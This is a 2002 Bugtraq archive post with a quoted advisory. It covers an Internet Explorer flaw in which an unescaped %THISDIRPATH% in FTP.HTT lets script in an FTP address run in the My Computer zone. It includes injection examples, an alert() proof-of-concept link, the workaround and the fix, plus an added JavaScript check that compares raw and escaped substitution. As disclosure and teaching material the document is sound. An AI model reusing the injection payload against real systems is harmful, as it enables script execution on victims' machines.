Bugtraq mailing list archives
Re: Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability
From: "Eiji James Yoshida" <ptrs-ejy () bp iij4u or jp>
Date: Sun, 4 Aug 2002 01:44:25 +0900
This problem (BugtraqID:4954) was corrected in Windows 2000 Service Pack 3.

Windows2000 SP3 (Q316890)
http://support.microsoft.com/default.aspx?scid=kb;en-us;q316890

Regards,

------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: zaddik () geocities co jp
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
------------------------------------------------------

----- Original Message -----
From: "Eiji James Yoshida" <ptrs-ejy () bp iij4u or jp>
To: <bugtraq () securityfocus com>
Sent: Friday, June 07, 2002 12:33 AM
Subject: Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+ Title:
~~~~~~~~~~~~~~~~~
Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability

+ Date:
~~~~~~~~~~~~~~~~~
7 June 2002

+ Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [zaddik () geocities co jp]

+ Risk:
~~~~~~~~~~~~~~~~~
Medium

+ Vulnerable:
~~~~~~~~~~~~~~~~~
Windows2000 SP2 IE5.5SP1
Windows2000 SP2 IE5.5SP2
Windows2000 SP2 IE6.0

+ Overview:
~~~~~~~~~~~~~~~~~
IE allows running Malicious Scripts due to a bug in 'folder View for FTP sites'.
If you enable both an 'Enable folder view for FTP sites' IE Advanced Setting and an 'Enable Web content in folders' Explorer Folder Option, the script embedded in FTP Server Address will run.
(Both options are set to 'Enable' by default.)

* It's important that the script runs in the My Computer zone!

+ Details:
~~~~~~~~~~~~~~~~~
The problem is in FTP.HTT invoked by the 'folder view for FTP sites' feature.
( %SystemRoot%\WEB\FTP.HTT )

- --------------------FTP.HTT--------------------
35: <BASE href="%THISDIRPATH%\">
- -----------------------------------------------

This '%THISDIRPATH%' is not escaped.

(Example 1)
[ ftp://TARGET ]
'%THISDIRPATH%' = 'ftp://TARGET/'
<BASE href="ftp://TARGET/\">
            ~~~~~~~~~~~~~

(Example 2)
[ ftp://"><script>alert("Exploit");</script> ]
'%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/'
<BASE href="ftp://"><script>alert("Exploit");</script>/\">
            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ Exploit code:
~~~~~~~~~~~~~~~~~
<a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a>

+ Demonstration:
~~~~~~~~~~~~~~~~~
http://www.geocities.co.jp/SiliconValley/1667/advisory02e.html

+ Workaround:
~~~~~~~~~~~~~~~~~
Disable either 'Enable folder view for FTP sites' IE Advanced Setting or 'Enable Web content in folders' Explorer Folder Option.

+ Vendor status:
~~~~~~~~~~~~~~~~~
Microsoft was notified on 21 December 2001.

- ----------------------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: zaddik () geocities co jp
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
- ----------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8ckt
Comment: Eiji James Yoshida

iQA/AwUBPP93/TnqpMRtMot1EQJE+gCg3tezyI7XyhSatXTXkjuwTqkiuroAoOkA
55mgpZ0K8d9mx/c0pS2Knqoe
=PTNT
-----END PGP SIGNATURE-----
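
Added example, not part of the original advisory and not Microsoft's template code: it expands the quoted FTP.HTT line 35 with the advisory's Example 1 and Example 2 values, once unescaped as the advisory describes and once with the value HTML-escaped for a double-quoted attribute, and checks whether any markup ends up outside the BASE tag. The function names and the simplified tag scanner are assumptions made for illustration.

```javascript
// Added illustration of the flaw class; not Microsoft's FTP.HTT expansion code.
// Line 35 of FTP.HTT as quoted in the advisory.
const TEMPLATE_LINE = '<BASE href="%THISDIRPATH%\\">';

// The two %THISDIRPATH% values from the advisory's Example 1 and Example 2.
const EXAMPLE_1 = 'ftp://TARGET/';
const EXAMPLE_2 = 'ftp://"><script>alert("Exploit");</script>/';

// Behaviour the advisory describes: the value is pasted in unescaped.
// split/join avoids String.replace treating "$" in the value specially.
function expandRaw(template, dirPath) {
  return template.split('%THISDIRPATH%').join(dirPath);
}

// Encode the characters that can end a double-quoted attribute or open a tag.
function escapeAttr(value) {
  return value
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hardened form (hypothetical): escape first, then substitute.
function expandEscaped(template, dirPath) {
  return expandRaw(template, escapeAttr(dirPath));
}

// Read the expanded line the way an HTML parser would: the href value ends at
// the first '"', the tag at the next '>'. Anything left over is new markup.
function markupAfterBase(html) {
  const m = /^<BASE href="([^"]*)"[^>]*>(.*)$/s.exec(html);
  return m ? { href: m[1], leftover: m[2] } : null;
}

// True when the substituted value escaped the attribute it was meant to fill.
function breaksOut(html) {
  const parsed = markupAfterBase(html);
  return parsed === null || parsed.leftover !== '';
}

for (const value of [EXAMPLE_1, EXAMPLE_2]) {
  console.log('raw     breaks out:', breaksOut(expandRaw(TEMPLATE_LINE, value)));
  console.log('escaped breaks out:', breaksOut(expandEscaped(TEMPLATE_LINE, value)));
}
```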